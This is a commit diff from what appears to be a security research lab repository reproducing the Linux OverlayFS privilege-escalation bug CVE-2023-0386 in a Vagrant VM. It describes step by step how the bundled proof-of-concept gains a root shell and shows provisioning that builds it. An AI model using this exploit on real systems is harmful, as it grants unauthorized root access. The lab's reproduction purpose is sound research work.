Update vagrant provisioner and readme

bbhunter · May 11, 2023 · 9be3d11 · 9be3d11
1 parent f701cc7
commit 9be3d11
Show file tree

Hide file tree

Showing 4 changed files with 12 additions and 13 deletions.
diff --git a/proof-of-concept-exploits/overlayfs-cve-2023-0386/README.md b/proof-of-concept-exploits/overlayfs-cve-2023-0386/README.md
@@ -21,20 +21,14 @@ john@ubuntu-jammy:~$ id
 uid=1002(john) gid=1002(john) groups=1002(john)
 ```
 
-* Clone and compile the [proof of concept repository](https://github.com/xkaneiki/CVE-2023-0386/)
+* Exploit
 
-```
-git clone https://github.com/xkaneiki/CVE-2023-0386.git
-cd CVE-2023-0386
-git checkout c4c65cefca1365c807c397e953d048506f3de195
-make all
-```
+The virtual machine is provisioned with an exploit merging the different pieces of this [proof of concept repository](https://github.com/xkaneiki/CVE-2023-0386/) into one single static binary. This binary creates folders tree under `/tmp/ovlcap` and starts FUSE filesystem which serves an suid executable. It then calls `unshare` with mount overlay command and copy of the lower suid executable. Finally, it runs the suid executable to spawn a root shell.
 
-* Run the following commands to exploit the vulnerability and escalate to root:
+Run the following command to exploit the vulnerability and escalate to root:
 
 ```
-./fuse ./ovlcap/lower ./gc >/dev/null 2>&1 &
-./exp
+./poc
 ```
 
 <p align="center">
@@ -44,4 +38,4 @@ make all
 ## Credits
 
 Proof-of-concept: https://github.com/xkaneiki/CVE-2023-0386/
-Reproduction for Datadog: Ryan Simon
+Reproduction for Datadog: Ryan Simon and Fred Baguelin
diff --git a/proof-of-concept-exploits/overlayfs-cve-2023-0386/Vagrantfile b/proof-of-concept-exploits/overlayfs-cve-2023-0386/Vagrantfile
@@ -8,4 +8,9 @@ Vagrant.configure("2") do |config|
   config.vm.synced_folder '.', '/vagrant', disabled: true
 
   config.vm.provision "shell", path: "provision.sh"
+
+  config.vm.provision "file", source: "poc.c", destination: "poc.c"
+  config.vm.provision "file", source: "Makefile", destination: "Makefile"
+
+  config.vm.provision "shell", inline: "mv {poc.c,Makefile} /home/john && cd /home/john && make && chown john:john {poc*,Makefile}"
 end
diff --git a/proof-of-concept-exploits/overlayfs-cve-2023-0386/provision.sh b/proof-of-concept-exploits/overlayfs-cve-2023-0386/provision.sh
@@ -2,8 +2,8 @@
 
 # Pre-requisites
 sudo apt update
-sudo apt-get install -y make gcc libfuse-dev libcap-dev
+sudo apt-get install -y make gcc libfuse-dev
 
 
 # Underprivileged user
-sudo useradd john --create-home --shell /bin/bash
+sudo useradd john --create-home --shell /bin/bash
diff --git a/proof-of-concept-exploits/overlayfs-cve-2023-0386/screenshot.png b/proof-of-concept-exploits/overlayfs-cve-2023-0386/screenshot.png